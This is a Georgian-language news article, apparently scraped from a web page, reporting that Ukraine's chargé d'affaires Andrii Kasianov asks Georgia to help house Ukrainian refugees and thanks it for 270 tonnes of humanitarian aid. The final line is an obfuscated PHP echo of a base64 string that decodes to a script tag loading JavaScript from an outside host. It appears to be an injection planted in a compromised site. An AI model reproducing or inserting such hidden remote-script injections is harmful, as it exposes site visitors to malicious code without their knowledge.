celsiusi
ავერსი საქკაბელი
საქართველოში უკრაინის დროებითმა რწმუნებული ანდრეი კასიანოვი იმედს გამოთქვამს, რომ საქართველოს მთავრობა უკრაინიდან წამოსულ ლტოლვილებს სათანადო დახამრებას გაუწევს და მათ დროებით საცხოვრებელს უზრუნველყოფს.
 
როგორც ანდრეი კასიანოვმა უკრაინის საელჩოში გამართულ ბრიფინგზე განაცხადა, რუსეთის აგრესიის შედეგი 2 მილიონი უკრაინელი ლტოლვილია, რომელთა მიღების რეგიონულ კერად პოლონეთი იქცა, თუმცა მხოლოდ ის „უკვე ვერ უმკლავდება უკრაინიდან წამოსული ლტოლვილების ნაკადს“.
 
მისივე თქმით, უკრაინას და საქართველოს მხოლოდ ერთად შეუძლიათ შექმნილი უსიამოვნებების გადალახვა, ამიტომ რუსეთის აგრესიის წინააღმდეგ ყველას ერთიანობისა და საერთო ქმედებებისაკენ მოუწოდებს.
 
,,დღეს რუსეთის აგრესიის შედეგია 2 მილიონი უკრაინელი ლტოლვილი, „Unicef”-ის ინფორმაციით, მათგან 1 მილიონი ბავშვია. ჰუმანიტარული მდგომარეობა ძალზედ მძიმეა, მადლობას ვუხდით პოლონეთს, რომელიც იქცა ლტოლვილების მიღების რეგიონალურ კერად, მაგრამ მხოლოდ ის უკვე ვერ უმკლავდება უკრაინიდან წამოსული ლტოლვილების ნაკადს. ლტოლვილების მიღებას აქტიურად უერთდებიან გერმანია, შვეიცარია, კანადა და დასავლეთის სხვა ქვეყნები. საქართველოს მთავრობა და ადგილობრივი თვითმმართლოვებები აკეთებენ ყველაფერს რათა უზრუნველყონ შესაძლო მხარდაჭერა უკრაინის მოქალაქეებისადმი, რომელთაც იძულებითი წესით უწევთ გაქცევა საკუთარი ტერიტორიიდან. ვიმედოვნებთ, რომ საქართველო მათ სათანადო დახმარებას გაუწევს და უზრუნველყოფს მათ საცხოვრებელს.
 
ჩვენ ვხედავთ, რომ ქართველი ხალხი თვალს ადევნებს მოვლენების განვითარებას უკრაინაში და მართავს მრავალრიცხვვოვან გამოსვლებს საქართველოს ქალაქებსა და დასახლებულ პუნქტებში, რითაც გამოხატავს სოლიდარობას უკრაინისა და უკრაინელი ხალხის მიმართ. უკრაინა და საქართველო მოძმე ერები არიან, რომლებმაც განიცადეს აგრესია რუსეთის მხრიდან, ეს უბედურება მათ აერთიანებთ. უკრაინას და საქართველოს მხოლოდ ერთად შეუძლიათ შექმნილი უსიამოვნებების გადალახვა, ამიტომ მოვუწოდებ ყველას ერთიანობისა და საერთო ქმედებებისაკენ რუსეთის ბარბაროსული აგრესიის შესაჩერებლად“, - აღნიშნა ანდრეი კასიანოვმა.
 
უკრაინის დროებითმა რწმუნებულის ინფორმაციით, საქართველოდან უკრაინაში გადაგზავნილი ჰუმანიტარული დახმარება 270 ტონას შეადგენს.
 
,,უკრაინის მოქალაქეები და ქართული ბიზნეს სექტორი საქართველოში აგროვებენ თანხება და ჰუმანიტარულ დახმარებას, იქნება ეს საკვები პროდუქტები, წამლები, სამედიცინო საშუალებები, ჰიგიენური საშუალებები თუ სხვა. ასევე დიდი მადლობა ვუცხადებთ საქართველოს ეკლესიას იმ დახმარებისთვის, რაც მან გაუწია უკრაინას. იმ თანხებით რომელიც უკრაინის საელჩოს ანგარიშზე იყო დარიცხული საკვები პროდუქტების შეძენა მოხდა. დღევანდელი დღის მდგომარეობით საქართველოდან უკრაინაში გაიგზავნა ჰუმანიტარული დახმარებით სავსე 2 თვითმფრინავი და 16 სატვირთო. საერთო ჯამში დახმარება 270 ტონას შეადგენს. ჩვენ დიდ მადლობას ვუგზავნით ქართველ ერს და საქართველოს მთავრობას ამ დახმარებისათვის“, - აღნიშნა ანდრეი კასიანოვმა
849
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");